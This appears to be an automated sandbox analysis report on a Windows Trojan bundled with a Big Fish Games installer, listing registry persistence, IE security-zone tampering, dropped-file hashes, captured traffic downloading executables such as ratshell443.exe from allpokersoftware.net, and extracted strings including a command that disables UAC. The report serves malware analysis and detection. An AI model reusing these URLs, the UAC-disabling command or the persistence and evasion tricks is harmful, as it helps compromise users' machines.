The process reg.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 8F 1E BE D5 94 10 F9 36 BE 03 C5 D3 3C 8F DA"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 44 0B 96 EA 08 30 BC 7F 68 9E AC B0 84 55 26"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 32 35 78 D9 64 26 02 77 86 DA AB 72 14 27 11"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 2B 32 F6 79 DF D7 DE 11 97 C9 8E E9 5E 01 FB"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 98 C7 AE 54 96 D5 54 81 09 09 A1 11 C7 C6 9E"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 B4 D5 BB 11 CD E8 A7 02 F4 DF E4 CB 97 75 67"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 3A 93 F3 0F A4 63 58 FC 2A 5C 47 31 1D 41 A1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C6 89 C6 50 71 1E 52 78 E1 EB 04 58 9A E2 C3"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 EF 4A B4 3D FF 01 E1 5F 16 41 EB 66 EA BC D0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 C1 AD 74 56 93 F3 39 54 1A 20 26 62 B4 E2 F7"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 6D 27 EB 29 59 AC AF A0 21 19 BA 70 09 96 49"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 78 5B DF C3 41 DC E3 E9 E5 C5 42 C8 C3 13 7C"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Big Fish Games\Persistence\Install]
"(Default)" = "{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Big Fish Games\Persistence\EnabledToolbars]
"1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 7B F9 92 F0 A7 F4 46 4D 69 BD 47 84 04 6B B7"

[HKLM\SOFTWARE\Big Fish Games]
"Upgraded" = "0"

[HKLM\SOFTWARE\Big Fish Games\Persistence]
"MSFT_DirectX_EULA_Accepted" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Big Fish Games\Client]
"GameClubMember" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies the IE security-zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
9a78a4f43e8b5b5d8a902fd62652f31c c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe
ecdb92b185077fffcd650ea65cf5d510 c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
334b41d348990d25241a5d4aba42391b c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
e1d7bc3fcbadd4cf8b5a27b5edad90c2 c:\Documents and Settings\"%CurrentUserName%"\Application DataFilename.exe
5d9984768c24fda50bc27f26301d414c c:\Documents and Settings\"%CurrentUserName%"\CrashHandler.exe
3ed972db9e8adf26a3bfd1c038922ffb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE
7ec86b3094b76ab39cfe287b8e3e6737 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
02d7f5e5dd1512bee2343a21d9970eba c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\NSISdl.dll
959ea64598b9a3e494c00e8fa793be7e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\System.dll
d16e06c5de8fb8213a0464568ed9852f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\UserInfo.dll
bf1ccc7f5c46e024e800f6c1e9df8206 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\inetc.dll
fae3be7a9827eaa3ef9f43832805e110 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\nsProcess.dll
4e1c46e37af4b3ab0036cb1e85c81608 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\uac.dll
689a3befb2abc9a4c968dab1bd33a965 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\AccessControl.dll
959ea64598b9a3e494c00e8fa793be7e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\System.dll
d16e06c5de8fb8213a0464568ed9852f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\UserInfo.dll
4e1c46e37af4b3ab0036cb1e85c81608 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\uac.dll
cb3897fff233b89fe46c52f4a86636f6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\System.dll
f2805a876754590f252130d367f382ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\UserInfo.dll
cb3897fff233b89fe46c52f4a86636f6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\System.dll
f2805a876754590f252130d367f382ff c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\UserInfo.dll
e1d7bc3fcbadd4cf8b5a27b5edad90c2 c:\Documents and Settings\"%CurrentUserName%"\Ptype.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 26860 27136 4.29791 ab9512ee7c9f5ad72ae20fba64a6341e
.itext 32768 776 1024 3.22992 c79df70a8b89425189a65adf4e08a6b8
.data 36864 2040 2048 0.904367 240816d5b34f6e1e38eab9c91fbec05d
.bss 40960 11172 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 53248 2246 2560 2.90066 4b57ef8451a1099532bf2707e4ad39e3
.tls 57344 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 61440 24 512 0.14174 15b26e576cc064822312d1c66bb6f693
.reloc 65536 3612 4096 4.20936 92c609bf93bf264697ab3000df42f30f
.rsrc 69632 243268 243712 5.30233 376efca94063269884d49f0950403f04

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://allpokersoftware.net/chromelog.exe 89.233.106.130
hxxp://allpokersoftware.net/Ptype.exe
hxxp://allpokersoftware.net/ratshell443.exe
hxxp://208.77.152.196/server_time.php


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Python-urllib/ Suspicious User Agent
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers

Traffic

GET /Ptype.exe HTTP/1.1
Host: allpokersoftware.net


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:03 GMT
Server: Apache
Last-Modified: Tue, 08 Apr 2014 16:56:32 GMT
Accept-Ranges: bytes
Content-Length: 99328
Connection: close
Content-Type: application/x-msdownload

<<< skipped >>>

GET /server_time.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: mkt_code=bfgdefault; afsrc=afxxxxxxxxxx; PHPSESSID=5r93onv1a77cmf81855jfbaah2


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 36
Keep-Alive: timeout=15, max=10000
Connection: Keep-Alive
Content-Type: text/html
{"now":1397743395,"12am":1397718000}....



GET /server_time.php HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: afsrc=afxxxxxxxxxx; mkt_code=bfgdefault; PHPSESSID=5r93onv1a77cmf81855jfbaah2


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.big


GET /ratshell443.exe HTTP/1.0
Host: allpokersoftware.net
User-Agent: Python-urllib/1.17


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:08 GMT
Server: Apache
Last-Modified: Wed, 02 Apr 2014 21:24:12 GMT
Accept-Ranges: bytes
Content-Length: 5889983
Connection: close
Content-Type: application/x-msdownload

<<< skipped >>>

GET /chromelog.exe HTTP/1.1
Host: allpokersoftware.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:02:57 GMT
Server: Apache
Last-Modified: Mon, 07 Apr 2014 23:52:52 GMT
Accept-Ranges: bytes
Content-Length: 3666664
Connection: close
Content-Type: application/x-msdownload

<<< skipped >>>

HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE_1648:

.text
`.rdata
@.data
.ndata
.rsrc
tDSSh
%s %s
... %d%%
verifying installer: %d%%
ADVAPI32.dll
~nsu.tmp\
shlwapi.dll
%u.%u%s%s
KERNEL32.dll
.DEFAULT\Control Panel\International
*?|<>/":
\wininit.ini
%s=%s
%Program Files%
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegDeleteKeyA
RegCloseKey
RegEnumKeyA
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
ole32.dll
VERSION.dll
Au_.exe
RichEd20.dll
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
PLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
\System.dll
Thawte Certification1
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
 http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at https://www.verisign.com/rpa (c)101.0,
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
https://www.verisign.com/cps0*
#http://logo.verisign.com/vslogo.gif04
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
Nullsoft Install System v2.46-Unicode
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp
nsi2.tmp
%Documents and Settings%\All Users\Application Data\BigFishCache
XR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE"
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v06-Dec-2010.cvs
3.3.0.2
04090000
04070000

HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe_1128:

.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
GetProcessHeap
GetCPInfo
nsProcess.dll
KERNEL32.DLL
NTDLL.DLL
Run-Time Check Failure #%d - %s
Kernel32.dll
MSPDB71.DLL
IMAGEHLP.DLL
RegOpenKeyExA
ADVAPI32.DLL
mscoree.dll
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0x%p.
DAMAGE: before %hs block (#%d) at 0x%p.
%hs allocated at file %hs(%d).
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
GetProcessWindowStation
f:\vs70builds\3077\vc\crtbld\crt\src\sprintf.c
f:\vs70builds\307
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
timestamp>ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl8.tmp
inetc.dll
nning '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'
id>493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
me_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp\inetc.dll
>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
Execute: "%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
bfgsetup_s1_l1.exe
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe
nts and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
tdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
EID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}
sion="1.0" encoding="utf-16" ?>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a8640
7P9MT7EX72W..exe
1397743395
wnload, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'
493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
FG_Monitor_f8c5f096-93d6-4f5f-8474-fc53d9c7540c
sage>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy6.tmp
>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
bfggameservices.exe
?xml version="1.0" encoding="utf-16" ?>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce493593493593ShutdownBFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a86400
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
571081478
cceeded with download, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'
%Documents and Settings%\All Users\Application Data\BigFishCache
{"IDENTIFIER":"0", "IDENTIFIER_TYPE":"DOWNLOADID", "CURRENT_SITEID":"", "CURRENT_LANGUAGEID":"", "STUB_LANGUAGEID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}
{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}
3.3.0.2
04090000

Ptype.exe_1144:

.idata
.rdata
P.reloc
P.rsrc
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
kernel32.dll
76487-644-3177037-23510
55274-640-2673064-23950
sbiedll.dll
dbghelp.dll
RLHOOK32.DLL
snxhk.dll
Software\Microsoft\Windows\CurrentVersion
ntdll.dll
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
%sysdir%\
%sysdir%
~a39.log
cmd_.bat
sevane.tmp
user32.dll
cmd.dll
~a21524.log
GetProcessHeap
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
WinExec
GetWindowsDirectoryA
wsock32.dll
shell32.dll
ShellExecuteA
KWindows
66006666

bfgsetup_s1_l1.exe_1796:

.text
`.rdata
@.data
.ndata
.rsrc
tDSSh
%s %s
... %d%%
verifying installer: %d%%
ADVAPI32.dll
~nsu.tmp\
shlwapi.dll
%u.%u%s%s
KERNEL32.dll
.DEFAULT\Control Panel\International
*?|<>/":
\wininit.ini
%s=%s
%Program Files%
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegDeleteKeyA
RegCloseKey
RegEnumKeyA
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
ole32.dll
VERSION.dll
Au_.exe
RichEd20.dll
